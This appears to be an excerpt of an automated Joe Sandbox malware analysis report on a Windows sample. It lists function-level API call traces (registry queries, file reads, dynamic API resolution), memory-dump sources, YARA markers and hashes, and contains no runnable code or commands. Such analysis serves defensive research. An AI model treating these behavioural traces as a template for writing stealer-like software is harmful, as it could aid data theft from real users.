                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception
                                                    • String ID: vector<T> too long$yxxx$yxxx$x@$x@
                                                    • API String ID: 2884196479-4254290729
                                                    • Opcode ID: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction ID: 642d6f8d25606cb57c5c368211f8c71801378994f2d8b98954bdbb6ac3618ebc
                                                    • Opcode Fuzzy Hash: ccec9a3570fd5dde12dbfba51e33401b3f4037cced4bc9963d9987cc80863dde
                                                    • Instruction Fuzzy Hash: 3F31B7B5E005159BCB08DF58C9906AEBBB6EB88310F14827EE905EB385DB34A901CBD5
                                                    Function 024A2A87 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 47registrymemoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2A9C
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 024A2AA3
                                                      • Part of subcall function 024A2B17: GetProcessHeap.KERNEL32(00000000,00000104,00000000), ref: 024A2B2C
                                                      • Part of subcall function 024A2B17: RtlAllocateHeap.NTDLL(00000000), ref: 024A2B33
                                                      • Part of subcall function 024A2B17: RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024A2AB0), ref: 024A2B52
                                                      • Part of subcall function 024A2B17: RegQueryValueExA.ADVAPI32(024A2AB0,0043565C,00000000,00000000,00000000,000000FF), ref: 024A2B6C
                                                      • Part of subcall function 024A2B17: RegCloseKey.ADVAPI32(024A2AB0), ref: 024A2B76
                                                    • RegOpenKeyExA.ADVAPI32(80000002,00638B98,00000000,00020119,024997C7), ref: 024A2AD8
                                                    • RegQueryValueExA.ADVAPI32(024997C7,00638C34,00000000,00000000,00000000,000000FF), ref: 024A2AF3
                                                    • RegCloseKey.ADVAPI32(024997C7), ref: 024A2AFD
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heap$AllocateCloseOpenProcessQueryValue
                                                    • String ID: Windows 11
                                                    • API String ID: 3225020163-2517555085
                                                    • Opcode ID: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction ID: 98f4230c4523f08708cf37bbcdfd125e926774d78195a173f45c0d03dedf93c3
                                                    • Opcode Fuzzy Hash: 74fdb98eb98f73a9fad628fe2b7ff6a3fcb41b0f7c395888142856023f75cff2
                                                    • Instruction Fuzzy Hash: C1018B71640309AFE714DBA4AC89EAA7B6EEB44315F00115ABE09D3290DAB09D449BE0
                                                    Function 02487C07 Relevance: 10.1, APIs: 8, Instructions: 109stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02487977: RegOpenKeyExA.ADVAPI32(80000001,?,00000000,00020019,?), ref: 024879AC
                                                      • Part of subcall function 02487977: RegEnumValueA.ADVAPI32(80000001,00000000,?,?,00000000,?,?,?,?,00000000,00020019,?), ref: 024879F1
                                                      • Part of subcall function 02487977: strlen.MSVCRT ref: 02487A25
                                                      • Part of subcall function 02487977: StrStrA.SHLWAPI(?,0043508C), ref: 02487A5F
                                                      • Part of subcall function 02487977: strcpy_s.MSVCRT ref: 02487A88
                                                      • Part of subcall function 02487977: GetProcessHeap.KERNEL32(00000000,00000000), ref: 02487A93
                                                      • Part of subcall function 02487977: HeapFree.KERNEL32(00000000), ref: 02487A9A
                                                      • Part of subcall function 02487977: strlen.MSVCRT ref: 02487AA7
                                                    • lstrcat.KERNEL32(00638E68,0043509C), ref: 02487C37
                                                    • lstrcat.KERNEL32(00638E68,?), ref: 02487C64
                                                    • lstrcat.KERNEL32(00638E68,004350A0), ref: 02487C76
                                                    • lstrcat.KERNEL32(00638E68,?), ref: 02487C97
                                                    • wsprintfA.USER32 ref: 02487CB7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02487CE0
                                                    • lstrcat.KERNEL32(00638E68,00000000), ref: 02487CEE
                                                    • lstrcat.KERNEL32(00638E68,0043509C), ref: 02487D07
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$Heapstrlen$EnumFreeOpenProcessValuelstrcpystrcpy_swsprintf
                                                    • String ID:
                                                    • API String ID: 2460923012-0
                                                    • Opcode ID: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                    • Instruction ID: d197083da17d7582775b71f1d87140427210425edb2eeb5a987f834b4f3a4dd5
                                                    • Opcode Fuzzy Hash: 1b33f8e6ae0bd5b6c31613e9ea586c2b36b80fb2e963691b99dbe2669c738b8a
                                                    • Instruction Fuzzy Hash: E331B576910614EFDB14EB64DC44AAFFBBABB88714B28151EF60993310DB74E941CBA0
                                                    Function 0248A0A7 Relevance: 9.2, APIs: 4, Strings: 2, Instructions: 182memorystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0248A136
                                                    • LocalAlloc.KERNEL32(00000040), ref: 0248A16E
                                                      • Part of subcall function 024A7477: lstrcpy.KERNEL32(00000000,ERROR), ref: 024A7495
                                                    • lstrcpy.KERNEL32(00000000,0043520C), ref: 0248A279
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AllocLocalmemset
                                                    • String ID: @$@"C
                                                    • API String ID: 4098468873-2306624759
                                                    • Opcode ID: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                    • Instruction ID: 0a7d150738467da45cc4265de3e7fdd2f5789fdeac6cbed533625d51dea6929c
                                                    • Opcode Fuzzy Hash: 348eed32ae7f3be2cf892227805f9ad38ab5b6ec06d10a2157ed781bce6e881d
                                                    • Instruction Fuzzy Hash: 7D51C271A102A8ABDB10FFB5DC44B9E7BA5AF44318F14446BED08AB241D7B4E941CF90
                                                    Function 0249DB27 Relevance: 9.1, APIs: 6, Instructions: 128registrystringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memset.MSVCRT ref: 0249DB53
                                                    • RegOpenKeyExA.ADVAPI32(80000001,00638CD8,00000000,00020119,?,00000000,000000FE), ref: 0249DB73
                                                    • RegQueryValueExA.ADVAPI32(?,006388D4,00000000,00000000,?,?), ref: 0249DB9A
                                                    • RegCloseKey.ADVAPI32(?), ref: 0249DBA5
                                                    • lstrcat.KERNEL32(?,?), ref: 0249DBCB
                                                    • lstrcat.KERNEL32(?,00638968), ref: 0249DBDD
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcat$CloseOpenQueryValuememset
                                                    • String ID:
                                                    • API String ID: 2623679115-0
                                                    • Opcode ID: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
                                                    • Instruction ID: 903285dffb701295ac8796ddbecab6ff5d6ce46bb5df887ee6e4740862d0d655
                                                    • Opcode Fuzzy Hash: 4a1af6a0b45cfe44b2eee7f251b24306f0ea58b01f04f9454eab07ea38461d91
                                                    • Instruction Fuzzy Hash: 25414A71614288AFD714FF25D841FDE77A6AF84714F00882EB94C87261EB71A949CF92
                                                    Function 00409AE0 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,004012EE), ref: 00409AFA
                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,004012EE), ref: 00409B10
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,004012EE), ref: 00409B27
                                                    • ReadFile.KERNEL32(00000000,00000000,?,004012EE,00000000,?,?,?,004012EE), ref: 00409B40
                                                    • LocalFree.KERNEL32(?,?,?,?,004012EE), ref: 00409B60
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,004012EE), ref: 00409B67
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                    • Instruction ID: d5e2846254d17b4b79341e9ac440d2f7db04c9e9ad0a28dbd651dd387858d46a
                                                    • Opcode Fuzzy Hash: 27aadecc548f36f42eb2dce9c3a0e69697191336073de94daf9abdf25517cddd
                                                    • Instruction Fuzzy Hash: 06114C71A00209AFE7109FA5ED84ABB737DFB04750F10016AB904A72C1EB78BD408BA8
                                                    Function 02489D47 Relevance: 9.1, APIs: 6, Instructions: 67filememoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000,?,?,?,?,?,02481555), ref: 02489D61
                                                    • GetFileSizeEx.KERNEL32(00000000,?,?,?,?,02481555), ref: 02489D77
                                                    • LocalAlloc.KERNEL32(00000040,?,?,?,?,02481555), ref: 02489D8E
                                                    • ReadFile.KERNEL32(00000000,00000000,?,02481555,00000000,?,?,?,02481555), ref: 02489DA7
                                                    • LocalFree.KERNEL32(?,?,?,?,02481555), ref: 02489DC7
                                                    • CloseHandle.KERNEL32(00000000,?,?,?,02481555), ref: 02489DCE
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: File$Local$AllocCloseCreateFreeHandleReadSize
                                                    • String ID:
                                                    • API String ID: 2311089104-0
                                                    • Opcode ID: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                    • Instruction ID: 81f6dc07cbf91bad1d4550d7088a5a28180e7619599e83581317059abf86f564
                                                    • Opcode Fuzzy Hash: 037b2ed9aec129e54901a5306ec9d4c93cee606d009a71b02df5ca158d82cdb5
                                                    • Instruction Fuzzy Hash: 15112E71610615AFEB10EFA8DC84EBF77ADEB04744F10455AF91197380EB70AD40CBA4
                                                    Function 004089B0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 93COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004089C6
                                                      • Part of subcall function 0042A1F0: std::exception::exception.LIBCMT ref: 0042A205
                                                      • Part of subcall function 0042A1F0: __CxxThrowException@8.LIBCMT ref: 0042A21A
                                                    • std::_Xinvalid_argument.LIBCPMT ref: 004089FD
                                                      • Part of subcall function 0042A1A3: std::exception::exception.LIBCMT ref: 0042A1B8
                                                      • Part of subcall function 0042A1A3: __CxxThrowException@8.LIBCMT ref: 0042A1CD
                                                    • memcpy.MSVCRT(?,00000000,?,00000000,?,?,00408800,?,00000000,004077D7), ref: 00408A5B
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Exception@8ThrowXinvalid_argumentstd::_std::exception::exception$memcpy
                                                    • String ID: invalid string position$string too long
                                                    • API String ID: 2202983795-4289949731
                                                    • Opcode ID: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                    • Instruction ID: 649aac53c67e3ee9f5cf0101b70db7c319c758bc323567c03d989288a4630d66
                                                    • Opcode Fuzzy Hash: a1c32616d7e307a16c2fa6441a0b7187f150f24f1c37d319d238f952b07782fc
                                                    • Instruction Fuzzy Hash: 0721F6723006108BC720AA5CEA40A6BF7A9DBA1760B20093FF181DB7C1DA79D841C7ED
                                                    Function 02487097 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 69memoryCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • memcpy.MSVCRT(?,004074D0,00000040,02487634), ref: 024870A7
                                                    • memcpy.MSVCRT(?,00005A4D,000000F8,00000000), ref: 024870E3
                                                    • GetProcessHeap.KERNEL32(00000008,?), ref: 0248711B
                                                    • RtlAllocateHeap.NTDLL(00000000), ref: 02487122
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: Heapmemcpy$AllocateProcess
                                                    • String ID: @
                                                    • API String ID: 966719176-2766056989
                                                    • Opcode ID: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                    • Instruction ID: dfd9433c1a11f6a86afe63854a4499e8c52320b2a105fc26801f0233bbfae18b
                                                    • Opcode Fuzzy Hash: 69f325cfa0226fa075afd252caf388089ea43902eca3c4d2321855712a9bd385
                                                    • Instruction Fuzzy Hash: 1521A1B46107018BDB259B24CC94BBBB3E8FB40704F98446DE946CBB84E7B8E941CB90
                                                    Function 00408B50 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 31COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(004078EE,004088DD,03C3C3C3,00000401,004078EE,?,00000000,?,004078EE,80000001), ref: 00408B70
                                                    • std::exception::exception.LIBCMT ref: 00408B8B
                                                    • __CxxThrowException@8.LIBCMT ref: 00408BA0
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: Pv@$x@
                                                    • API String ID: 3448701045-2507878009
                                                    • Opcode ID: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                    • Instruction ID: d532d441e19495b57cb34d138c3e0c88a0b377879b543fee6e4065129139ec29
                                                    • Opcode Fuzzy Hash: 980d6eea7b664cab60e6d86db1e8d11ee68504ae67a5a5b0083e142dd03a954a
                                                    • Instruction Fuzzy Hash: 37F027B160020997EB18E7E08D027BF7374AF00304F04847EA911E2340FB7CD605819A
                                                    Function 00408D80 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,00408C9B,00000000,?,?,00000000), ref: 00408D92
                                                    • std::exception::exception.LIBCMT ref: 00408DAD
                                                    • __CxxThrowException@8.LIBCMT ref: 00408DC2
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1833400574.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000003.00000002.1833400574.0000000000443000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000044B000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000046E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000048E000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000493000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004CD000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004DA000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.00000000004F9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000507000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000522000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000055D000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000580000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.0000000000638000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    • Associated: 00000003.00000002.1833400574.000000000064A000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_400000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: Pv@$PC
                                                    • API String ID: 3448701045-1362088297
                                                    • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction ID: c1c2e9470fcfd07362e0a09b01d9ac21ad58a2ed8b2a4eb6edd2c0a09cf1513b
                                                    • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction Fuzzy Hash: 9AE02B7050030A97CB18F7B59D016BF73789F10304F40476FE965A22C1EF798504859D
                                                    Function 02488FE7 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 26COMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • ??2@YAPAXI@Z.MSVCRT(?,02488F02,00000000,?,?,00000000), ref: 02488FF9
                                                    • std::exception::exception.LIBCMT ref: 02489014
                                                    • __CxxThrowException@8.LIBCMT ref: 02489029
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: ??2@Exception@8Throwstd::exception::exception
                                                    • String ID: PC$PC
                                                    • API String ID: 3448701045-3524912142
                                                    • Opcode ID: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction ID: b4cfd5d90325537ffc803a47755dfcb9950e42d66b7512be19275512029ba51f
                                                    • Opcode Fuzzy Hash: b42475b819e5296bc50c64d31f11e30ed0ca5ba6e695ecad0727ff97edcd75c6
                                                    • Instruction Fuzzy Hash: B6E02B7080060956CB28FFF58C107BF73789F00314F00071FE82A52380EB7081048A95
                                                    Function 02497967 Relevance: 7.9, APIs: 5, Instructions: 406stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                      • Part of subcall function 02489257: ??2@YAPAXI@Z.MSVCRT(00000020), ref: 02489260
                                                      • Part of subcall function 024A4A67: LoadLibraryA.KERNEL32(0043573C,?,024979A8), ref: 024A4A6D
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435748), ref: 024A4A83
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435750), ref: 024A4A94
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043575C), ref: 024A4AA5
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435768), ref: 024A4AB6
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435770), ref: 024A4AC7
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043577C), ref: 024A4AD8
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,00435784), ref: 024A4AE9
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043578C), ref: 024A4AFA
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,0043579C), ref: 024A4B0B
                                                      • Part of subcall function 024A4A67: GetProcAddress.KERNEL32(00000000,004357A8), ref: 024A4B1C
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                      • Part of subcall function 024A74A7: lstrcpy.KERNEL32(00000000), ref: 024A74C1
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,0042D01C), ref: 02495E7C
                                                      • Part of subcall function 02495E47: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?), ref: 02495EAB
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495EDC
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F04
                                                      • Part of subcall function 02495E47: lstrcat.KERNEL32(00000000,00000000), ref: 02495F0F
                                                      • Part of subcall function 02495E47: lstrcpy.KERNEL32(00000000,00000000), ref: 02495F37
                                                    Memory Dump Source
                                                    • Source File: 00000003.00000002.1834051629.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_3_2_2480000_8DF0.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID: lstrcpy$AddressProc$??2@FolderLibraryLoadPathlstrcat
                                                    • String ID:
                                                    • API String ID: 3558977763-0
                                                    • Opcode ID: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                    • Instruction ID: cac4b3e80a399d6e2909ce78946bd407be3a0d67157d6467df3c9362df8eedc4
                                                    • Opcode Fuzzy Hash: 6aeff865d584790d0d634a92a901b01971934c05726d59cf815502abfbd14370
                                                    • Instruction Fuzzy Hash: 47F14EB1E102058FDF24DF29C944B59BBB2AF88314F19C1AED809AB391D735E946CF91
                                                    Function 02497E76 Relevance: 7.9, APIs: 5, Instructions: 367stringCOMMON
                                                    Download Yara Rule
                                                    APIs
                                                    • StrCmpCA.SHLWAPI(?,00638AAC), ref: 024979D7
                                                    • StrCmpCA.SHLWAPI(?,00638C1C), ref: 02497AAF
                                                    • lstrcpy.KERNEL32(00000000,0042D01C), ref: 02497AE7
                                                    • lstrcpy.KERNEL32(00000000,?), ref: 02497B44
                                                      • Part of subcall function 024A74A7: lstrcpy.KERNEL32(00000000), ref: 024A74C1
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 0248169E
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816C0
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 024816E2
                                                      • Part of subcall function 02481677: lstrcpy.KERNEL32(00000000,?), ref: 02481746
